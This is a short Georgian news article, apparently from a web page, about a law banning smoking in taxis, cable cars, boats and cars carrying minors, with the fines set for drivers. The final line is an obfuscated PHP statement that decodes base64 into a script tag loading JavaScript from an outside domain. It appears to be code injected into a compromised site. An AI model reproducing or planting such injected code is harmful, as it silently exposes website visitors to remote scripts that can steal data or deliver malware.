celsiusi
ავერსი საქკაბელი
ტაქსიში, საბაგირო ტრანსპორტსა და ნებისმიერ სანაოსნო საშუალებაში თამბაქოს მოწევა აიკრძალა. თამბაქოს კონტროლის შესახებ კანონში ცვლილება პარლამენტმა 80 ხმით ერთის წინააღმდეგ დაამტკიცა. 
 
ცვლილებების თანახმად, თამბაქოს მოწევა ასევე აკრძალული იქნება საკუთრებაში არსებულ ავტოსატრანსპორტო საშუალებაში (ავტომობილში), რომლითაც ხდება არასრულწლოვანის გადაყვანა.
 
თავდაპირველად შემოთავაზებული ცვლილებების მიხედვით, საზოგადოებრივი ტრანსპორტის ჩამონათვალს, სადაც თამბაქოს მოწევა აკრძალულია, ემატებოდა ტაქსი და სანაოსნო საშუალებები, მეორე მოსმენით განხილვის წინ კი ამ ჩამონათვალს საბაგირო ტრანსპორტიც დაემატა.
 
ცვლილების თანახმად, ტაქსის, ან ნებისმიერი სანაოსნო საშუალების მძღოლი ტრანსპორტში მოწევის აკრძალვის მოთხოვნის შეუსრულებლობისთვის 200 ლარით დაჯარიმდება. 
 
ავტომობილით არასრულწლოვნის გადაყვანისას მოწევისთვის კი მძღოლი 50 ლარით დაჯარიმდება. ამასთანავე, კანონპროექტი ითვალისწინებს ჯარიმების გაორმაგებას ქმედებების მეორედ, მესამედ და მის შემდეგ ყოველი მომდევნო ჩადენისთვის.
 
კანონპროექტების ინიციატორები პარლამენტის წევრები დიმიტრი ხუნდაძე და ვლადიმერ კახაძე არიან.
 
985
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");